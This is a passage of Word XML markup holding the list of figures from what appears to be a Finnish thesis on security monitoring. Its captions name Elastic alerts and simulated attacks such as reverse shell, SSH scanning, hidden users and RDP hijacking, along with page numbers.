          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="75F85B60" w14:textId="419FFFE5">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7">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 10. Hälytys DNS liikenteestä</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971527 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>12</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="53D67A65" w14:textId="7B0AC976">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8">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 11. reverse shell</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971528 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>13</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="66224CBB" w14:textId="5784B585">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29">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 12. Hälytys SSH-skannauksesta</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971529 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="4CE68C2E" w14:textId="44BEDED2">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0">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 13. Test_ftp</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971530 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>14</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="439CB047" w14:textId="19938E66">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1">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 14. Failed_attempt</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971531 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="6D237F63" w14:textId="2A8801A8">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2">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 15. Commands_shadow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971532 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>15</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="05DAF2E1" w14:textId="58F17CE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3">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 16. alerts_shadow</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971533 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="3BA4433B" w14:textId="0E5BABF5">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4">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 17. commands_startup</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971534 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>16</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="27B40FB1" w14:textId="0B099916">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5">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 18.Alert_startup</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971535 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="41CACA4C" w14:textId="40EC339C">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6">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 19.NewUser</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971536 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>17</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="1BBFAD03" w14:textId="22678541">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7">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 20. Alert_NewUser2</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971537 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="235D190B" w14:textId="048EBE9F">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8">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 21. Prosessin_luonti</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971538 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>18</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="45968360" w14:textId="67F25C7D">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39">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 22. Alert T1543.003</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971539 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>19</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="3A3AE58C" w14:textId="71D113AE">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0">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 23. Commands_DC01</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971540 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="00850660" w14:textId="4FF650BA">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1">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 24. Elastic_alerts</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971541 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>20</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="0A52548A" w14:textId="6648778F">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2">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 25. Error_info</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971542 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>21</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="1381E670" w14:textId="1343FD9F">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3">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 26. Commands_hiddenuser</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971543 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="79720D6B" w14:textId="65078F5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4">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 27.alert_hiddenUser</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971544 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="2779C94E" w14:textId="6D769D34">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5">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 28. ElasticAnalytics</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971545 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>22</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="062C8823" w14:textId="785E6146">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6">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 29. commands_rdphijack</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971546 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="756F4F2C" w14:textId="38BFEEB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7">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 30. alerts_rdphijack</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc183971547 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>23</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00137B5B" w:rsidRDefault="00137B5B" w14:paraId="4A3D4E7C" w14:textId="57138CA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8">
        <w:r w:rsidRPr="009C77BF">
          <w:rPr>
            <w:rStyle w:val="Hyperlinkki"/>
            <w:noProof/>
          </w:rPr>
          <w:t>Kuvio 31. elastic_analyzer</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
